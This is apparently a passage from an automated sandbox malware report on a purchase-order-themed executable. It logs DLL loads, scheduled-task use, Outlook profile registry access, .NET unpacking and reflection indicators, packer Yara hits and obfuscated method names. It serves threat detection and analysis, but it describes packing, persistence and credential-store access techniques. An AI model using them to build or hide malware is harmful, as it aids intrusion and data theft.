Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Automated click: OK
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: PO-0Y9005373R664.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO-0Y9005373R664.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: PO-0Y9005373R664.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: QUbn.pdb source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr
Source:	Binary string: QUbn.pdbH source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: PO-0Y9005373R664.exe, fV.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: VvtddClQv.exe.0.dr, fV.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, TP.cs	.Net Code: aJ0(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),aJ0(typeof(Type).TypeHandle)})
Source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, TP.cs	.Net Code: aJ0(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),aJ0(typeof(Type).TypeHandle)})
Source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, TP.cs	.Net Code: aJ0(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),aJ0(typeof(Type).TypeHandle)})
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, TP.cs	.Net Code: aJ0(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),aJ0(typeof(Type).TypeHandle)})

.NET source code contains potential unpacker

Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, Bl.cs	.Net Code: lI
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, Bl.cs	.Net Code: RQ System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, XZhbQ8WE4aovuBFcQB.cs	.Net Code: BUuk4eyquk System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, Bl.cs	.Net Code: lI
Source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, Bl.cs	.Net Code: RQ System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, XZhbQ8WE4aovuBFcQB.cs	.Net Code: BUuk4eyquk System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, Bl.cs	.Net Code: lI
Source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, Bl.cs	.Net Code: RQ System.Reflection.Assembly.Load(byte[])
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, Bl.cs	.Net Code: lI
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, Bl.cs	.Net Code: RQ System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-0Y9005373R664.exe PID: 6964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VvtddClQv.exe PID: 3788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VvtddClQv.exe PID: 4780, type: MEMORYSTR

Source: PO-0Y9005373R664.exe

Static PE information: 0xFB4B49A3 [Wed Aug 8 11:21:07 2103 UTC]

Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_04D642D7 push ebx; ret	10_2_04D642DA
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_04D6CDF3 push ecx; retf	10_2_04D6CDF4
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_04D6CE36 push cs; retf	10_2_04D6CE37
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 14_2_00402AC0 push eax; ret	14_2_00402AD4
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 14_2_00402AC0 push eax; ret	14_2_00402AFC

Source: PO-0Y9005373R664.exe	Static PE information: section name: .text entropy: 7.801340855529023
Source: VvtddClQv.exe.0.dr	Static PE information: section name: .text entropy: 7.801340855529023

Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, Bl.cs	High entropy of concatenated method names: 'ee', 'Bq', 'YC', 'Nc', 'g4', 'Yo', 'ry', 'TP', 'TO', 'pM'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, pTTmYoVRkOeIAgkNeM.cs	High entropy of concatenated method names: 'Ginpr51BBh', 'ubapC3HplC', 'MLepqlQZ16', 'DUTpNnE3t1', 'yV9pvQGUf0', 'yKkp60Mk05', 'eclpJb0e9J', 'JOXpOd1jQc', 'C8Mp5DFFyi', 'AZdpBP3Hy4'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, vh2XIFx33KRH78xEvs.cs	High entropy of concatenated method names: 'GBU47GNXk', 'vhgcl4DcK', 'Is8KHfBcx', 'qCVQ5JpGI', 'bphCxBjMC', 'HAHouWZvo', 'Gs49BqFN3e598iCbBP', 'v1hC81q1yR1yXh44Qb', 'KYp8gPug3', 'gQJMnh0bL'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, jBBHLdYwHKBrLllDiR.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Yf1xnrLNNb', 'mEBx2xCFuA', 'DTpxzAHj8r', 'WKgZhscCg5', 'piyZdqQjUD', 'cBgZx0g8ma', 'xLkZZmJTd0', 'xJtnYIIa9hXqC6W9ZMr'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, eYEKDP2GE6cew4SCTp.cs	High entropy of concatenated method names: 'usgGdxHjNK', 'aF1GZ1Yc7J', 'AMpGkAVORJ', 'eU2GRTxjGy', 'P5yGfGv4oT', 'QIUGATHYbQ', 'mYWGU6sGTv', 'yYG8Hpjkbt', 'qhF8ub9HtH', 'lNC8nlhXyR'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, tTYYeIshwagx1FcyAi.cs	High entropy of concatenated method names: 'ekGeuRYTA4', 'LxEe2N3bd4', 'Bnt8hWpXsj', 'bqu8dMj35J', 'XLXeB2LbcI', 'GJjelWOBTb', 'mSxeVu26sF', 'kZpebqUFnA', 'JsCewGprsW', 'Ue4eioLZpn'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, PS2NlEOnjZUh96hpnF.cs	High entropy of concatenated method names: 'u0cSeDqCp4', 'jtFSGPkLhW', 'Td8ST16W7O', 'rygQWDTKnUYv2m6fsLn', 'yGVMoBTNI9yHN5X16Lh', 'bFFDxSTi9g3SXAJjSlU'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, zrCqU4n1QW4GgLO0ue.cs	High entropy of concatenated method names: 'Qgw8qvcRAW', 'iox8Nvqq9T', 'CmK89V292E', 'nwX8vcovpo', 'VDH8b6lqV8', 'hCd86pSShJ', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, Mf3efOqNXMCRYllY73.cs	High entropy of concatenated method names: 'XRsUEQxKGC', 'PJSUfGorM9', 'gCWUA0IDFN', 'clmUSpyMGU', 'DhAUWECY3t', 'hYCAgemYDM', 'Lk8AsT9dDw', 'tHVAHyFHIe', 'IyTAupDyFE', 'dZiAnbfi64'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, OxqnvgdhxIeqiZ49U2b.cs	High entropy of concatenated method names: 'UQxGFFPPlT', 'z6FGaPxoRq', 'l2NG4QNsuk', 'de9Gc8vB8S', 'GKVG0ZeaD7', 'zAPGKrNdVf', 'z7fGQjZyhI', 'b3IGrwY6t6', 'nmyGCnukAm', 'qplGohmtbn'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, fOWLITo0j7RU5pI8Qj.cs	High entropy of concatenated method names: 'wF5A012Yy7', 'h6nAQrlo0n', 'UtRY9W0CoB', 'tUtYvWuPbR', 'lglY6GkfDA', 'qUwYyLD803', 'xevYJXLM3M', 'yieYOWYbdZ', 'a6mYIqu5ui', 'JlkY5Aa7Re'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, PBHriKJKeph1PelbqM.cs	High entropy of concatenated method names: 'VhoSRtQZxD', 'zq9SYx4C1O', 'RDTSUITIOa', 't8BU2ee4UM', 'vxJUzPocYj', 'dCVSh1og0V', 'oDgSddPb3V', 'lcPSxLeyBv', 'z93SZdALlG', 'IWXSk1KDjN'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, bb1hSSIRuAeMou56uT.cs	High entropy of concatenated method names: 'DXlSFfI6ls', 'TxgSa34KlC', 'xeyS4VjaHc', 'hyHSco5RAT', 'W7vS0YwD9Q', 'gafSKHFB82', 'xhHSQxAZEb', 'J6aSrimIcf', 'cK6SCpStQf', 'l8DSokqmfl'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, pLZGiRzgbb9pSuqqOM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yURGphOl7H', 'xMSGLKMG1x', 'wIQGTkW2Yy', 'V5jGeWoTBG', 'rqmG8OnT72', 'bNmGGBJKOV', 'dC8GMs0SB1'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, QNqGEObeC0ElKAYmpu.cs	High entropy of concatenated method names: 'pZjL5mXQ8L', 'd90LlOMDHX', 'dtdLbTgCNT', 'wl0Lw6wV7Q', 'F2RLNLMeYc', 'KqZL9X4yyj', 'zQdLvdFHsV', 'kjkL6t5bT2', 'TDXLyjiXdo', 'X4bLJDYqqd'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, e1b2ZjdZWNjlnE5OMH5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KsxMbTrlA6', 'biPMw3gnoU', 'XtQMiLtrej', 'hBNMt9lPvg', 'TK8Mgquns9', 'q3bMsPthIF', 'dNfMHXmmAh'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, XZhbQ8WE4aovuBFcQB.cs	High entropy of concatenated method names: 'd7hZE8BOra', 'kd6ZR4FZVH', 'TxvZftlhD7', 'QA3ZYcht0x', 'f9BZAPUxnl', 'QK9ZUM7mfK', 'kytZSCg62H', 'JaHZWZEvLF', 'OKaZ7Ert6k', 'bGGZXf2XaW'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, IJK0bgf3vOugddBNya.cs	High entropy of concatenated method names: 'Dispose', 'DIidn5kjuL', 'bX5xNFU7rs', 'wo566M2J6U', 'rQNd2f4aif', 'jhEdzXHyED', 'ProcessDialogKey', 'CN4xhrCqU4', 'mQWxd4GgLO', 'BuexxEYEKD'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, VqpQBNtIvoHmSYRcRo.cs	High entropy of concatenated method names: 'pAjeXY5BQT', 'MRGe1DT6ax', 'ToString', 'jvXeRxjw98', 'B4iefweuCW', 'vg8eYUQoqm', 'yILeAyTtUU', 'GvNeUURs1b', 'nKyeSp8Yu9', 'OVaeW0YFaw'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, uILpQ9dxK7DFccctIX8.cs	High entropy of concatenated method names: 'z28MFN33wk', 'OogMadbFth', 'DgAM4Y51gM', 'Hjr0V25pXJRfvQ0kjx9', 'KJS4Wr5WVZLHG86jY7V', 'lpDLW45ffibjYILiNYg', 'gwnRhR5Ei6QkC1cxcYh'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, MRdYc2k47ARfnHdgRp.cs	High entropy of concatenated method names: 'qOqdSaqf9D', 'jrRdWGZEHH', 'T4cdXJe22u', 'rxUd1oROWL', 'oI8dLQjOf3', 'pfOdTNXMCR', 'IapdK8iRhvkDUAOLbi', 'QxSGKmpZKNlBj1cRhR', 'C2IddttuA1', 'EfedZDcH8l'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, Gaqf9DrSrRGZEHH27Q.cs	High entropy of concatenated method names: 'tocfbEJUrw', 'AKafwIE2UM', 'qrpfiDZh3M', 'HgXft9rIpS', 'datfgR1cqn', 'EUYfsxxoR5', 'pQqfH0xsue', 'l4Hfu1dYH8', 'lTMfnflETd', 'LOZf2bspY1'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, CNf4aiufShEXHyEDKN.cs	High entropy of concatenated method names: 'XYT8RcPDQ3', 'VTr8fAol7F', 'x4t8YZu38E', 'lnq8AeNnCq', 'Jri8UNfYtO', 'LXl8S8iAYF', 'KKG8WwgtQr', 'VbP87YxjGC', 'ipm8XpRHJn', 'Qig81OEUMD'
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, LUHUJtC4cJe22u8xUo.cs	High entropy of concatenated method names: 'zMEYccKRmm', 'WSRYKPTpW7', 'YCjYrYQlpK', 'aYSYCSSI6K', 'OrWYL0c3Zq', 'yMqYTQOFhF', 'CrVYebT4Ne', 'XI7Y8Qpa89', 'AOHYGPWKQ9', 'rI5YMp7Fqi'
Source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, Bl.cs	High entropy of concatenated method names: 'ee', 'Bq', 'YC', 'Nc', 'g4', 'Yo', 'ry', 'TP', 'TO', 'pM'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, pTTmYoVRkOeIAgkNeM.cs	High entropy of concatenated method names: 'Ginpr51BBh', 'ubapC3HplC', 'MLepqlQZ16', 'DUTpNnE3t1', 'yV9pvQGUf0', 'yKkp60Mk05', 'eclpJb0e9J', 'JOXpOd1jQc', 'C8Mp5DFFyi', 'AZdpBP3Hy4'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, vh2XIFx33KRH78xEvs.cs	High entropy of concatenated method names: 'GBU47GNXk', 'vhgcl4DcK', 'Is8KHfBcx', 'qCVQ5JpGI', 'bphCxBjMC', 'HAHouWZvo', 'Gs49BqFN3e598iCbBP', 'v1hC81q1yR1yXh44Qb', 'KYp8gPug3', 'gQJMnh0bL'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, jBBHLdYwHKBrLllDiR.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Yf1xnrLNNb', 'mEBx2xCFuA', 'DTpxzAHj8r', 'WKgZhscCg5', 'piyZdqQjUD', 'cBgZx0g8ma', 'xLkZZmJTd0', 'xJtnYIIa9hXqC6W9ZMr'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, eYEKDP2GE6cew4SCTp.cs	High entropy of concatenated method names: 'usgGdxHjNK', 'aF1GZ1Yc7J', 'AMpGkAVORJ', 'eU2GRTxjGy', 'P5yGfGv4oT', 'QIUGATHYbQ', 'mYWGU6sGTv', 'yYG8Hpjkbt', 'qhF8ub9HtH', 'lNC8nlhXyR'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, tTYYeIshwagx1FcyAi.cs	High entropy of concatenated method names: 'ekGeuRYTA4', 'LxEe2N3bd4', 'Bnt8hWpXsj', 'bqu8dMj35J', 'XLXeB2LbcI', 'GJjelWOBTb', 'mSxeVu26sF', 'kZpebqUFnA', 'JsCewGprsW', 'Ue4eioLZpn'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, PS2NlEOnjZUh96hpnF.cs	High entropy of concatenated method names: 'u0cSeDqCp4', 'jtFSGPkLhW', 'Td8ST16W7O', 'rygQWDTKnUYv2m6fsLn', 'yGVMoBTNI9yHN5X16Lh', 'bFFDxSTi9g3SXAJjSlU'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, zrCqU4n1QW4GgLO0ue.cs	High entropy of concatenated method names: 'Qgw8qvcRAW', 'iox8Nvqq9T', 'CmK89V292E', 'nwX8vcovpo', 'VDH8b6lqV8', 'hCd86pSShJ', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, Mf3efOqNXMCRYllY73.cs	High entropy of concatenated method names: 'XRsUEQxKGC', 'PJSUfGorM9', 'gCWUA0IDFN', 'clmUSpyMGU', 'DhAUWECY3t', 'hYCAgemYDM', 'Lk8AsT9dDw', 'tHVAHyFHIe', 'IyTAupDyFE', 'dZiAnbfi64'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, OxqnvgdhxIeqiZ49U2b.cs	High entropy of concatenated method names: 'UQxGFFPPlT', 'z6FGaPxoRq', 'l2NG4QNsuk', 'de9Gc8vB8S', 'GKVG0ZeaD7', 'zAPGKrNdVf', 'z7fGQjZyhI', 'b3IGrwY6t6', 'nmyGCnukAm', 'qplGohmtbn'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, fOWLITo0j7RU5pI8Qj.cs	High entropy of concatenated method names: 'wF5A012Yy7', 'h6nAQrlo0n', 'UtRY9W0CoB', 'tUtYvWuPbR', 'lglY6GkfDA', 'qUwYyLD803', 'xevYJXLM3M', 'yieYOWYbdZ', 'a6mYIqu5ui', 'JlkY5Aa7Re'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, PBHriKJKeph1PelbqM.cs	High entropy of concatenated method names: 'VhoSRtQZxD', 'zq9SYx4C1O', 'RDTSUITIOa', 't8BU2ee4UM', 'vxJUzPocYj', 'dCVSh1og0V', 'oDgSddPb3V', 'lcPSxLeyBv', 'z93SZdALlG', 'IWXSk1KDjN'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, bb1hSSIRuAeMou56uT.cs	High entropy of concatenated method names: 'DXlSFfI6ls', 'TxgSa34KlC', 'xeyS4VjaHc', 'hyHSco5RAT', 'W7vS0YwD9Q', 'gafSKHFB82', 'xhHSQxAZEb', 'J6aSrimIcf', 'cK6SCpStQf', 'l8DSokqmfl'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, pLZGiRzgbb9pSuqqOM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yURGphOl7H', 'xMSGLKMG1x', 'wIQGTkW2Yy', 'V5jGeWoTBG', 'rqmG8OnT72', 'bNmGGBJKOV', 'dC8GMs0SB1'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, QNqGEObeC0ElKAYmpu.cs	High entropy of concatenated method names: 'pZjL5mXQ8L', 'd90LlOMDHX', 'dtdLbTgCNT', 'wl0Lw6wV7Q', 'F2RLNLMeYc', 'KqZL9X4yyj', 'zQdLvdFHsV', 'kjkL6t5bT2', 'TDXLyjiXdo', 'X4bLJDYqqd'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, e1b2ZjdZWNjlnE5OMH5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KsxMbTrlA6', 'biPMw3gnoU', 'XtQMiLtrej', 'hBNMt9lPvg', 'TK8Mgquns9', 'q3bMsPthIF', 'dNfMHXmmAh'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, XZhbQ8WE4aovuBFcQB.cs	High entropy of concatenated method names: 'd7hZE8BOra', 'kd6ZR4FZVH', 'TxvZftlhD7', 'QA3ZYcht0x', 'f9BZAPUxnl', 'QK9ZUM7mfK', 'kytZSCg62H', 'JaHZWZEvLF', 'OKaZ7Ert6k', 'bGGZXf2XaW'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, IJK0bgf3vOugddBNya.cs	High entropy of concatenated method names: 'Dispose', 'DIidn5kjuL', 'bX5xNFU7rs', 'wo566M2J6U', 'rQNd2f4aif', 'jhEdzXHyED', 'ProcessDialogKey', 'CN4xhrCqU4', 'mQWxd4GgLO', 'BuexxEYEKD'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, VqpQBNtIvoHmSYRcRo.cs	High entropy of concatenated method names: 'pAjeXY5BQT', 'MRGe1DT6ax', 'ToString', 'jvXeRxjw98', 'B4iefweuCW', 'vg8eYUQoqm', 'yILeAyTtUU', 'GvNeUURs1b', 'nKyeSp8Yu9', 'OVaeW0YFaw'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, uILpQ9dxK7DFccctIX8.cs	High entropy of concatenated method names: 'z28MFN33wk', 'OogMadbFth', 'DgAM4Y51gM', 'Hjr0V25pXJRfvQ0kjx9', 'KJS4Wr5WVZLHG86jY7V', 'lpDLW45ffibjYILiNYg', 'gwnRhR5Ei6QkC1cxcYh'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, MRdYc2k47ARfnHdgRp.cs	High entropy of concatenated method names: 'qOqdSaqf9D', 'jrRdWGZEHH', 'T4cdXJe22u', 'rxUd1oROWL', 'oI8dLQjOf3', 'pfOdTNXMCR', 'IapdK8iRhvkDUAOLbi', 'QxSGKmpZKNlBj1cRhR', 'C2IddttuA1', 'EfedZDcH8l'
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, Gaqf9DrSrRGZEHH27Q.cs	High entropy of concatenated method names: 'tocfbEJUrw', 'AKafwIE2UM', 'qrpfiDZh3M', 'HgXft9rIpS', 'datfgR1cqn', 'EUYfsxxoR5', 'pQqfH0xsue', 'l4Hfu1dYH8', 'lTMfnflETd', 'LOZf2bspY1'
